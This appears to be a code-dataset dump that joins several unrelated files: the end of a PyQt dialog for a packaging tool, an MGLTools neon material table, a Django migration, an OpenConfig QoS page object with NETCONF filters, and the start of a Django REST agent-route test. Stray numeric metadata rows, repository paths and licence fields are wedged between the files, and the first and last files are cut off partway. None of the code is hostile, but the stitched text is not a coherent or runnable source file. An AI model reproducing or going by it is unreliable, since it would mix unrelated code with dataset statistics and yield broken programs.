palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipText, brush)
self.label_2.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(12)
font.setBold(False)
font.setItalic(False)
font.setWeight(50)
self.label_2.setFont(font)
self.label_2.setObjectName(_fromUtf8("label_2"))
self.tabWidget.addTab(self.dabao, _fromUtf8(""))
self.widget = QtGui.QWidget()
self.widget.setObjectName(_fromUtf8("widget"))
self.tabWidget.addTab(self.widget, _fromUtf8(""))
self.retranslateUi(Dialog)
self.tabWidget.setCurrentIndex(1)
QtCore.QMetaObject.connectSlotsByName(Dialog)
def retranslateUi(self, Dialog):
Dialog.setWindowTitle(_translate("Dialog", "Dialog", None))
self.label_3.setText(_translate("Dialog", "打包工具", None))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.index), _translate("Dialog", "首页", None))
self.groupBox.setTitle(_translate("Dialog", "打包工具", None))
self.label.setText(_translate("Dialog", "快速打包", None))
self.label_2.setText(_translate("Dialog", "配置管理", None))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.dabao), _translate("Dialog", "打包工具", None))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.widget), _translate("Dialog", "三方插件", None))
| 58.738205
| 106
| 0.692563
| 7,570
| 63,496
| 5.800793
| 0.024174
| 0.188582
| 0.114775
| 0.150642
| 0.953065
| 0.947941
| 0.940745
| 0.939675
| 0.938513
| 0.938513
| 0
| 0.04665
| 0.182342
| 63,496
| 1,080
| 107
| 58.792593
| 0.799145
| 0.003449
| 0
| 0.920188
| 1
| 0
| 0.002482
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.004695
| false
| 0
| 0.000939
| 0.002817
| 0.00939
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ddf5a78beaa8080110bb6eda6e1e720ce67391f3
| 9,872
|
py
|
Python
|
resources/mgltools_x86_64Linux2_1.5.6/MGLToolsPckgs/DejaVu/materialsDef/neon.py
|
J-E-J-S/aaRS-Pipeline
|
43f59f28ab06e4b16328c3bc405cdddc6e69ac44
|
[
"MIT"
] | 8
|
2021-12-14T21:30:01.000Z
|
2022-02-14T11:30:03.000Z
|
resources/mgltools_x86_64Linux2_1.5.6/MGLToolsPckgs/DejaVu/materialsDef/neon.py
|
J-E-J-S/aaRS-Pipeline
|
43f59f28ab06e4b16328c3bc405cdddc6e69ac44
|
[
"MIT"
] | null | null | null |
resources/mgltools_x86_64Linux2_1.5.6/MGLToolsPckgs/DejaVu/materialsDef/neon.py
|
J-E-J-S/aaRS-Pipeline
|
43f59f28ab06e4b16328c3bc405cdddc6e69ac44
|
[
"MIT"
] | null | null | null |
# material definition table: neon
#
neon = [\
[ # 0
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[0.0, 0.398733, 1.0, 1.0]], # emission
[[0.622449, 0.622449, 0.622449, 1.0]], # specular
[0.0510204], # shininess
[ 1.0], # opacity
],
[ # 1
[[0.0972973, 0.0972973, 0.0972973, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[0.0, 0.628573, 1.0, 1.0]], # emission
[[0.47027, 0.47027, 0.47027, 1.0]], # specular
[0.0510204], # shininess
[ 1.0], # opacity
],
[ # 2
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[1.0, 0.871763, 0.0, 1.0]], # emission
[[0.622449, 0.622449, 0.622449, 1.0]], # specular
[0.0510204], # shininess
[ 1.0], # opacity
],
[ # 3
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[1.0, 0.7155, 0.0, 1.0]], # emission
[[0.622449, 0.622449, 0.622449, 1.0]], # specular
[0.0510204], # shininess
[ 1.0], # opacity
],
[ # 4
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[1.0, 0.577069, 0.0, 1.0]], # emission
[[0.383784, 0.383784, 0.383784, 1.0]], # specular
[0.0540541], # shininess
[ 1.0], # opacity
],
[ # 5
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[1.0, 0.442751, 0.0, 1.0]], # emission
[[0.475676, 0.475676, 0.475676, 1.0]], # specular
[0.0510204], # shininess
[ 1.0], # opacity
],
[ # 6
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[1.0, 0.318894, 0.0, 1.0]], # emission
[[0.622449, 0.622449, 0.622449, 1.0]], # specular
[0.0864865], # shininess
[ 1.0], # opacity
],
[ # 7
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[1.0, 0.151505, 0.0, 1.0]], # emission
[[0.622449, 0.622449, 0.622449, 1.0]], # specular
[0.0510204], # shininess
[ 1.0], # opacity
],
[ # 8
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[1.0, 0.0, 0.0, 1.0]], # emission
[[0.622449, 0.622449, 0.622449, 1.0]], # specular
[0.0510204], # shininess
[ 1.0], # opacity
],
[ # 9
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[1.0, 0.0, 0.0807333, 1.0]], # emission
[[0.622449, 0.622449, 0.622449, 1.0]], # specular
[0.0510204], # shininess
[ 1.0], # opacity
],
[ # 10
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[1.0, 0.0, 0.265757, 1.0]], # emission
[[0.622449, 0.622449, 0.622449, 1.0]], # specular
[0.0510204], # shininess
[ 1.0], # opacity
],
[ # 11
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[1.0, 0.0, 0.34678, 1.0]], # emission
[[0.622449, 0.622449, 0.622449, 1.0]], # specular
[0.0510204], # shininess
[ 1.0], # opacity
],
[ # 12
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[0.0188407, 0.940276, 1.0, 1.0]], # emission
[[0.622449, 0.622449, 0.622449, 1.0]], # specular
[0.0510204], # shininess
[ 1.0], # opacity
],
[ # 13
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[1.0, 0.0790818, 0.656922, 1.0]], # emission
[[0.622449, 0.622449, 0.622449, 1.0]], # specular
[0.0510204], # shininess
[ 1.0], # opacity
],
[ # 14
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[0.934028, 0.00304288, 1.0, 1.0]], # emission
[[0.622449, 0.622449, 0.622449, 1.0]], # specular
[0.0510204], # shininess
[ 1.0], # opacity
],
[ # 15
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[0.755836, 0.0, 1.0, 1.0]], # emission
[[0.622449, 0.622449, 0.622449, 1.0]], # specular
[0.0510204], # shininess
[ 1.0], # opacity
],
[ # 16
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[0.58832, 0.0172936, 1.0, 1.0]], # emission
[[0.622449, 0.622449, 0.622449, 1.0]], # specular
[0.0510204], # shininess
[ 1.0], # opacity
],
[ # 17
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[0.460235, 0.0, 1.0, 1.0]], # emission
[[0.622449, 0.622449, 0.622449, 1.0]], # specular
[0.0510204], # shininess
[ 1.0], # opacity
],
[ # 18
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[0.17496, 0.0, 1.0, 1.0]], # emission
[[0.622449, 0.622449, 0.622449, 1.0]], # specular
[0.0510204], # shininess
[ 1.0], # opacity
],
[ # 19
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[0.0, 0.135953, 1.0, 1.0]], # emission
[[0.622449, 0.622449, 0.622449, 1.0]], # specular
[0.0510204], # shininess
[ 1.0], # opacity
],
[ # 20
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[0.0, 0.277276, 1.0, 1.0]], # emission
[[0.622449, 0.622449, 0.622449, 1.0]], # specular
[0.0510204], # shininess
[ 1.0], # opacity
],
[ # 21
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[0.0, 0.2805, 0.39661, 1.0]], # emission
[[0.616216, 0.616216, 0.616216, 1.0]], # specular
[0.0810811], # shininess
[ 1.0], # opacity
],
[ # 22
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[0.0, 0.2805, 0.040678, 1.0]], # emission
[[0.616216, 0.616216, 0.616216, 1.0]], # specular
[0.0810811], # shininess
[ 1.0], # opacity
],
[ # 23
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[0.0, 1.0, 0.734243, 1.0]], # emission
[[0.622449, 0.622449, 0.622449, 1.0]], # specular
[0.0510204], # shininess
[ 1.0], # opacity
],
[ # 24
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[0.921769, 0.544218, 0.0, 1.0]], # emission
[[0.637764, 0.37654, 0.0, 1.0]], # specular
[0.0540541], # shininess
[ 1.0], # opacity
],
[ # 25
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[1.0, 0.286509, 0.159322, 1.0]], # emission
[[0.535135, 0.535135, 0.535135, 1.0]], # specular
[0.0540541], # shininess
[ 1.0], # opacity
],
[ # 26
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[0.667797, 0.0769664, 0.171099, 1.0]], # emission
[[0.497297, 0.497297, 0.497297, 1.0]], # specular
[0.0540541], # shininess
[ 1.0], # opacity
],
[ # 27
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[0.59083, 0.0582792, 0.307405, 1.0]], # emission
[[0.6, 0.6, 0.6, 1.0]], # specular
[0.0756757], # shininess
[ 1.0], # opacity
],
[ # 28
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[0.595346, 0.187689, 0.595358, 1.0]], # emission
[[0.47027, 0.47027, 0.47027, 1.0]], # specular
[0.0540541], # shininess
[ 1.0], # opacity
],
[ # 29
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[0.0, 1.0, 0.456346, 1.0]], # emission
[[0.622449, 0.622449, 0.622449, 1.0]], # specular
[0.0510204], # shininess
[ 1.0], # opacity
],
[ # 30
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[0.0, 1.0, 0.168349, 1.0]], # emission
[[0.622449, 0.622449, 0.622449, 1.0]], # specular
[0.0510204], # shininess
[ 1.0], # opacity
],
[ # 31
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[0.0239058, 1.0, 0.00238997, 1.0]], # emission
[[0.622449, 0.622449, 0.622449, 1.0]], # specular
[0.0510204], # shininess
[ 1.0], # opacity
],
[ # 32
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[0.363921, 1.0, 0.0478005, 1.0]], # emission
[[0.622449, 0.622449, 0.622449, 1.0]], # specular
[0.0510204], # shininess
[ 1.0], # opacity
],
[ # 33
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[0.559606, 1.0, 0.0, 1.0]], # emission
[[0.622449, 0.622449, 0.622449, 1.0]], # specular
[0.0510204], # shininess
[ 1.0], # opacity
],
[ # 34
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[0.757687, 1.0, 0.0, 1.0]], # emission
[[0.622449, 0.622449, 0.622449, 1.0]], # specular
[0.0510204], # shininess
[ 1.0], # opacity
],
]
| 34.638596
| 61
| 0.398906
| 1,510
| 9,872
| 2.607947
| 0.072185
| 0.204165
| 0.223972
| 0.216353
| 0.843068
| 0.843068
| 0.832402
| 0.832402
| 0.832402
| 0.773997
| 0
| 0.367226
| 0.36639
| 9,872
| 284
| 62
| 34.760563
| 0.26235
| 0.218497
| 0
| 0.712766
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
fb0be3b2014f4cb9b13059f7dcf2f91a609323f9
| 1,938
|
py
|
Python
|
odata/migrations/0002_auto_20211018_1635.py
|
krishnaansh/djongo-mongo
|
af0afd7a9028b91eeca520c4c558c026a92971ac
|
[
"MIT"
] | 1
|
2021-03-17T21:37:53.000Z
|
2021-03-17T21:37:53.000Z
|
odata/migrations/0002_auto_20211018_1635.py
|
krishnaansh/djongo-mongo
|
af0afd7a9028b91eeca520c4c558c026a92971ac
|
[
"MIT"
] | null | null | null |
odata/migrations/0002_auto_20211018_1635.py
|
krishnaansh/djongo-mongo
|
af0afd7a9028b91eeca520c4c558c026a92971ac
|
[
"MIT"
] | 1
|
2021-03-02T19:35:18.000Z
|
2021-03-02T19:35:18.000Z
|
# Generated by Django 3.0.5 on 2021-10-18 11:05
from django.db import migrations
import djongo.models.fields
class Migration(migrations.Migration):
dependencies = [
('odata', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='categories',
name='id',
field=djongo.models.fields.ObjectIdField(auto_created=True, primary_key=True, serialize=False),
),
migrations.AlterField(
model_name='customer',
name='id',
field=djongo.models.fields.ObjectIdField(auto_created=True, primary_key=True, serialize=False),
),
migrations.AlterField(
model_name='newslettersubscription',
name='id',
field=djongo.models.fields.ObjectIdField(auto_created=True, primary_key=True, serialize=False),
),
migrations.AlterField(
model_name='payment',
name='id',
field=djongo.models.fields.ObjectIdField(auto_created=True, primary_key=True, serialize=False),
),
migrations.AlterField(
model_name='product',
name='id',
field=djongo.models.fields.ObjectIdField(auto_created=True, primary_key=True, serialize=False),
),
migrations.AlterField(
model_name='productimage',
name='id',
field=djongo.models.fields.ObjectIdField(auto_created=True, primary_key=True, serialize=False),
),
migrations.AlterField(
model_name='productvariant',
name='id',
field=djongo.models.fields.ObjectIdField(auto_created=True, primary_key=True, serialize=False),
),
migrations.AlterField(
model_name='userforgotpassword',
name='id',
field=djongo.models.fields.ObjectIdField(auto_created=True, primary_key=True, serialize=False),
),
]
| 35.236364
| 107
| 0.615067
| 190
| 1,938
| 6.142105
| 0.247368
| 0.092545
| 0.138817
| 0.1988
| 0.756641
| 0.756641
| 0.756641
| 0.756641
| 0.756641
| 0.756641
| 0
| 0.013466
| 0.27193
| 1,938
| 54
| 108
| 35.888889
| 0.813607
| 0.02322
| 0
| 0.666667
| 1
| 0
| 0.069276
| 0.011634
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.020833
| 0.041667
| 0
| 0.104167
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
34908c74a80f6b0bdedcb4334adb4a1c75134a30
| 5,194
|
py
|
Python
|
AutomationFramework/page_objects/qos/qos.py
|
sbarguil/Testing-framework
|
f3ef69f1c4f0aeafd02e222d846162c711783b15
|
[
"Apache-2.0"
] | 1
|
2020-04-23T15:22:16.000Z
|
2020-04-23T15:22:16.000Z
|
AutomationFramework/page_objects/qos/qos.py
|
sbarguil/Testing-framework
|
f3ef69f1c4f0aeafd02e222d846162c711783b15
|
[
"Apache-2.0"
] | 44
|
2020-08-13T19:35:41.000Z
|
2021-03-01T09:08:00.000Z
|
AutomationFramework/page_objects/qos/qos.py
|
sbarguil/Testing-framework
|
f3ef69f1c4f0aeafd02e222d846162c711783b15
|
[
"Apache-2.0"
] | 6
|
2020-04-23T15:29:38.000Z
|
2022-03-03T14:23:38.000Z
|
from AutomationFramework.page_objects.base.base_page_object import BasePageObject
class QOS(BasePageObject):
variables_paths = {
'qos_queue_name': [
{
'name': 'qos/queues/queue/name',
}
],
'qos_queue_minth': [
{
'name': 'qos/queues/queue/name',
'queue_type': 'qos/queues/queue/config/queue-type',
'minth': 'qos/queues/queue/red/config/minth',
}
],
'qos_queue_maxth': [
{
'name': 'qos/queues/queue/name',
'queue_type': 'qos/queues/queue/config/queue-type',
'maxth': 'qos/queues/queue/red/config/maxth',
}
],
'qos_scheduler_policy_name': [
{
'name': 'qos/scheduler-policies/scheduler-policy/name',
}
],
'qos_scheduler_sequence': [
{
'name': 'qos/scheduler-policies/scheduler-policy/name',
'sequence': 'qos/scheduler-policies/scheduler-policy/schedulers/scheduler/sequence',
}
],
'qos_scheduler_id': [
{
'name': 'qos/scheduler-policies/scheduler-policy/name',
'sequence': 'qos/scheduler-policies/scheduler-policy/schedulers/scheduler/sequence',
'id': 'qos/scheduler-policies/scheduler-policy/schedulers/scheduler/inputs/input/id',
}
],
'qos_scheduler_queue': [
{
'name': 'qos/queues/queue/name',
},
{
'name': 'qos/scheduler-policies/scheduler-policy/name',
'sequence': 'qos/scheduler-policies/scheduler-policy/schedulers/scheduler/sequence',
'id': 'qos/scheduler-policies/scheduler-policy/schedulers/scheduler/inputs/input/id',
'input_type': 'qos/scheduler-policies/scheduler-policy/schedulers/scheduler/inputs/input/config/input-type',
'queue_name': 'qos/scheduler-policies/scheduler-policy/schedulers/scheduler/inputs/input/config/queue',
},
],
'qos_scheduler_weight': [
{
'name': 'qos/scheduler-policies/scheduler-policy/name',
'sequence': 'qos/scheduler-policies/scheduler-policy/schedulers/scheduler/sequence',
'id': 'qos/scheduler-policies/scheduler-policy/schedulers/scheduler/inputs/input/id',
'weight': 'qos/scheduler-policies/scheduler-policy/schedulers/scheduler/inputs/input/config/weight',
}
],
'qos_scheduler_cir': [
{
'name': 'qos/scheduler-policies/scheduler-policy/name',
'sequence': 'qos/scheduler-policies/scheduler-policy/schedulers/scheduler/sequence',
'cir': 'qos/scheduler-policies/scheduler-policy/schedulers/scheduler/one-rate-two-color/config/cir',
}
],
'qos_scheduler_bc': [
{
'name': 'qos/scheduler-policies/scheduler-policy/name',
'sequence': 'qos/scheduler-policies/scheduler-policy/schedulers/scheduler/sequence',
'bc': 'qos/scheduler-policies/scheduler-policy/schedulers/scheduler/one-rate-two-color/config/bc',
}
],
'qos_scheduler_max_queue_depth_bytes': [
{
'name': 'qos/scheduler-policies/scheduler-policy/name',
'sequence': 'qos/scheduler-policies/scheduler-policy/schedulers/scheduler/sequence',
'max_queue_depth_bytes': 'qos/scheduler-policies/scheduler-policy/schedulers/scheduler/one-rate-two-color/config/max-queue-depth-bytes',
}
],
}
def execute_qos_queue_edit_config_test_case(self):
filter_to_use = """
<filter>
<qos xmlns="http://openconfig.net/yang/qos">
<queues>
<queue>
<name>{}</name>
</queue>
</queues>
</qos>
</filter>
"""
interface_name = self.get_variable_value_for_rpc_in_test_case(rpc_index=self.rpc_idx_in_test_case, variable='name')
self.set_filter(filter_to_use.format(interface_name))
self.execute_generic_edit_config_test_case()
def execute_qos_scheduler_edit_config_test_case(self):
filter_to_use = """
<filter>
<qos xmlns="http://openconfig.net/yang/qos">
<scheduler-policies>
<scheduler-policy>
<name>{}</name>
</scheduler-policy>
</scheduler-policies>
</qos>
</filter>
"""
interface_name = self.get_variable_value_for_rpc_in_test_case(rpc_index=self.rpc_idx_in_test_case, variable='name')
self.set_filter(filter_to_use.format(interface_name))
self.execute_generic_edit_config_test_case()
| 44.393162
| 152
| 0.544859
| 475
| 5,194
| 5.753684
| 0.134737
| 0.149287
| 0.182949
| 0.265276
| 0.822539
| 0.78412
| 0.769484
| 0.769484
| 0.750823
| 0.750823
| 0
| 0
| 0.330959
| 5,194
| 116
| 153
| 44.775862
| 0.786475
| 0
| 0
| 0.491071
| 0
| 0.053571
| 0.58221
| 0.376588
| 0
| 0
| 0
| 0
| 0
| 1
| 0.017857
| false
| 0
| 0.008929
| 0
| 0.044643
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
34ad8e5f7b7ae4792323cd76dd16e75a633fc845
| 16,496
|
py
|
Python
|
api/tests/tests_agents_route.py
|
djeni98/central-erros-back
|
5d81e47df99685b4a470df56e62ff2c537fc3a52
|
[
"MIT"
] | null | null | null |
api/tests/tests_agents_route.py
|
djeni98/central-erros-back
|
5d81e47df99685b4a470df56e62ff2c537fc3a52
|
[
"MIT"
] | 1
|
2021-04-08T21:16:15.000Z
|
2021-04-08T21:16:15.000Z
|
api/tests/tests_agents_route.py
|
djeni98/central-erros-back
|
5d81e47df99685b4a470df56e62ff2c537fc3a52
|
[
"MIT"
] | 1
|
2020-07-14T12:52:07.000Z
|
2020-07-14T12:52:07.000Z
|
from api.tests.TestCase import TestCase, PermissionUtilities
from rest_framework import status
from rest_framework.test import APIClient
from logs.models import User, Agent
class AgentRouteCase(TestCase, PermissionUtilities):
invalid_agent = {
'name': 'name' + 'n' * 256,
'environment': 'invalid_environment'
}
simple_valid_agent = {
'name': 'A simple valid agent',
'environment': 'testing'
}
full_valid_agent = {
'name': 'A full valid agent',
'environment': 'production',
'address': '127.0.0.1'
# user declared in setUp()
}
route = '/api/agents/'
def setUp(self):
self.client = APIClient()
self.create_users_with_permissions(Agent)
self.agents_list = []
users_list = []
self.agents_list.append(Agent.objects.create(environment='testing', name='agent 0'))
for i, env in enumerate(['development', 'testing', 'production']):
user = User.objects.create(username=f'user{i+1}', email=f'user{i+1}@email.com')
agent = Agent.objects.create(environment=env, name=f'agent {i+1}', user=user)
self.agents_list.append(agent)
